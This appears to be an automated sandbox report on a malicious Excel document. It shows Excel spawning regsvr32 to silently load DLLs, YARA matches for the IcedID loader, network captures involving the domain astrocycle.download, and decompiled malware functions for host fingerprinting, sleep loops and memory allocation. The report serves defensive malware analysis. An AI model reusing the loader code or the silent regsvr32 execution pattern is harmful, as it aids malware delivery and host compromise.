                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 66a9fc654c6c4e8b-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:57.236459970 CEST324INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                                                                    Jul 6, 2021 17:49:55.133055925 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                                                                                    CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                                                                                    CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                                                                                    CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 2388 Parent PID: 584

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Start time:17:49:42
                                                                                                                                                                                                                                                                    Start date:06/07/2021
                                                                                                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                                                    Imagebase:0x13f4b0000
                                                                                                                                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 2384 Parent PID: 2388

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Start time:17:49:45
                                                                                                                                                                                                                                                                    Start date:06/07/2021
                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                                                                    Imagebase:0xff140000
                                                                                                                                                                                                                                                                    File size:19456 bytes
                                                                                                                                                                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 2380 Parent PID: 2388

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Start time:17:49:45
                                                                                                                                                                                                                                                                    Start date:06/07/2021
                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                                                                    Imagebase:0xff140000
                                                                                                                                                                                                                                                                    File size:19456 bytes
                                                                                                                                                                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                    • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 2196 Parent PID: 2388

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Start time:17:49:49
                                                                                                                                                                                                                                                                    Start date:06/07/2021
                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                                                    Imagebase:0xff140000
                                                                                                                                                                                                                                                                    File size:19456 bytes
                                                                                                                                                                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    Chronological Activities

                                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                      Analysis Process: regsvr32.exe PID: 2380 Parent PID: 2388 regsvr32.exeCOMMON

                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                      Function 001B27BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                                                                                                                      			E001B27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E001B2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1b70c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E001B2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                                                                                      0x001b27bc
                                                                                                                                                                                                                                                                      0x001b27bc
                                                                                                                                                                                                                                                                      0x001b27bc
                                                                                                                                                                                                                                                                      0x001b27bf
                                                                                                                                                                                                                                                                      0x001b27c3
                                                                                                                                                                                                                                                                      0x001b27c7
                                                                                                                                                                                                                                                                      0x001b27cb
                                                                                                                                                                                                                                                                      0x001b27d4
                                                                                                                                                                                                                                                                      0x001b27d7
                                                                                                                                                                                                                                                                      0x001b27e7
                                                                                                                                                                                                                                                                      0x001b27ea
                                                                                                                                                                                                                                                                      0x001b27fa
                                                                                                                                                                                                                                                                      0x001b2800
                                                                                                                                                                                                                                                                      0x001b2806
                                                                                                                                                                                                                                                                      0x001b285f
                                                                                                                                                                                                                                                                      0x001b285f
                                                                                                                                                                                                                                                                      0x001b2876
                                                                                                                                                                                                                                                                      0x001b287b
                                                                                                                                                                                                                                                                      0x001b2893
                                                                                                                                                                                                                                                                      0x001b2893
                                                                                                                                                                                                                                                                      0x001b280f
                                                                                                                                                                                                                                                                      0x001b2814
                                                                                                                                                                                                                                                                      0x001b281f
                                                                                                                                                                                                                                                                      0x001b282c
                                                                                                                                                                                                                                                                      0x001b282c
                                                                                                                                                                                                                                                                      0x001b282f
                                                                                                                                                                                                                                                                      0x001b2835
                                                                                                                                                                                                                                                                      0x001b283b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x001b2842
                                                                                                                                                                                                                                                                      0x001b2845
                                                                                                                                                                                                                                                                      0x001b2849
                                                                                                                                                                                                                                                                      0x001b2894
                                                                                                                                                                                                                                                                      0x001b2897
                                                                                                                                                                                                                                                                      0x001b289e
                                                                                                                                                                                                                                                                      0x001b28a9
                                                                                                                                                                                                                                                                      0x001b28b5
                                                                                                                                                                                                                                                                      0x001b28b7
                                                                                                                                                                                                                                                                      0x001b28ba
                                                                                                                                                                                                                                                                      0x001b28c1
                                                                                                                                                                                                                                                                      0x001b28c8
                                                                                                                                                                                                                                                                      0x001b28cd
                                                                                                                                                                                                                                                                      0x001b28d0
                                                                                                                                                                                                                                                                      0x001b28d0
                                                                                                                                                                                                                                                                      0x001b28b5
                                                                                                                                                                                                                                                                      0x001b28d7
                                                                                                                                                                                                                                                                      0x001b28da
                                                                                                                                                                                                                                                                      0x001b28df
                                                                                                                                                                                                                                                                      0x001b28e8
                                                                                                                                                                                                                                                                      0x001b28ed
                                                                                                                                                                                                                                                                      0x001b28f6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x001b28fc
                                                                                                                                                                                                                                                                      0x001b284b
                                                                                                                                                                                                                                                                      0x001b2854
                                                                                                                                                                                                                                                                      0x001b2859
                                                                                                                                                                                                                                                                      0x001b2859

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdaptersInfo
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3177971545-0
                                                                                                                                                                                                                                                                      • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                                                      • Instruction ID: c60b736c70a9bf67489b71118c13e7adc89abf349c8ce38b573650b6f9e0f5ab
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21316B76705B8196EB15EB66E8407D977A0FB89F94F488026EF0D0775AEF38C58AC340
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B1678, Relevance: 3.1, APIs: 2, Instructions: 77memorynativeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B1709
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3114120137-0
                                                                                                                                                                                                                                                                      • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                                      • Instruction ID: de5eaa73b4bf9c880d833e3b3f886915295f1350fa53a2abd89165a0753c6d5c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA217C75315B4093EF04AB56E8643E972A2BB89BC1F9A8034EE0A87715EF3CC8458700
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B1810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                                      • Instruction ID: 5be9b9012fc57d3ca06ec49e383a8e517c543350cab4152e28e5ac8411bb9b6b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1871DB32311B819BEB24CF66E860BE937A5FB48B94F858129EE4A43B54DF38D595C700
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B22DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32 ref: 001B233C
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AccountLookupName
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1484870144-0
                                                                                                                                                                                                                                                                      • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                                                      • Instruction ID: 60f7399251d735b1e8cad7b8c0da10334775dee052dc7b02c6ac96509f9298b4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D316972705B418AEB109FB6E8443DA37A4FB48B88F588135EA4D57B29EF38C549C350
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 001B2434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                                                                                                      			E001B2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E001B11FC(_t73 - 0x29, _t52);
					_t37 = E001B153C(_t73 - 0x29);
					E001B2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E001B1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E001B272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E001B1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E001B2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2434
                                                                                                                                                                                                                                                                      0x001b2439
                                                                                                                                                                                                                                                                      0x001b243f
                                                                                                                                                                                                                                                                      0x001b244d
                                                                                                                                                                                                                                                                      0x001b244d
                                                                                                                                                                                                                                                                      0x001b244d
                                                                                                                                                                                                                                                                      0x001b2512
                                                                                                                                                                                                                                                                      0x001b2528
                                                                                                                                                                                                                                                                      0x001b2450
                                                                                                                                                                                                                                                                      0x001b2454
                                                                                                                                                                                                                                                                      0x001b2456
                                                                                                                                                                                                                                                                      0x001b245a
                                                                                                                                                                                                                                                                      0x001b2460
                                                                                                                                                                                                                                                                      0x001b2468
                                                                                                                                                                                                                                                                      0x001b246e
                                                                                                                                                                                                                                                                      0x001b2472
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x001b2474
                                                                                                                                                                                                                                                                      0x001b2482
                                                                                                                                                                                                                                                                      0x001b248c
                                                                                                                                                                                                                                                                      0x001b249d
                                                                                                                                                                                                                                                                      0x001b249f
                                                                                                                                                                                                                                                                      0x001b24a4
                                                                                                                                                                                                                                                                      0x001b24a7
                                                                                                                                                                                                                                                                      0x001b24b0
                                                                                                                                                                                                                                                                      0x001b24bf
                                                                                                                                                                                                                                                                      0x001b24c1
                                                                                                                                                                                                                                                                      0x001b24cc
                                                                                                                                                                                                                                                                      0x001b24d2
                                                                                                                                                                                                                                                                      0x001b24d7
                                                                                                                                                                                                                                                                      0x001b24db
                                                                                                                                                                                                                                                                      0x001b24e0
                                                                                                                                                                                                                                                                      0x001b24e2
                                                                                                                                                                                                                                                                      0x001b24f0
                                                                                                                                                                                                                                                                      0x001b24f0
                                                                                                                                                                                                                                                                      0x001b24fc
                                                                                                                                                                                                                                                                      0x001b2501
                                                                                                                                                                                                                                                                      0x001b2504
                                                                                                                                                                                                                                                                      0x001b250d
                                                                                                                                                                                                                                                                      0x001b250d
                                                                                                                                                                                                                                                                      0x001b2504
                                                                                                                                                                                                                                                                      0x001b24cc
                                                                                                                                                                                                                                                                      0x001b24bf
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x001b24a7

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                      • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                                                      • Instruction ID: c9da4ff87a2bc895bab384596edc4cc2c37c45b21341cafe2a5a99aac0f3a436
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0219272300A409AEF20EFB2E4543ED33A1F798784F994426EE4D57659EF38D549C350
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                                      • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                                                                      • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                                                                      • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                                                      • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
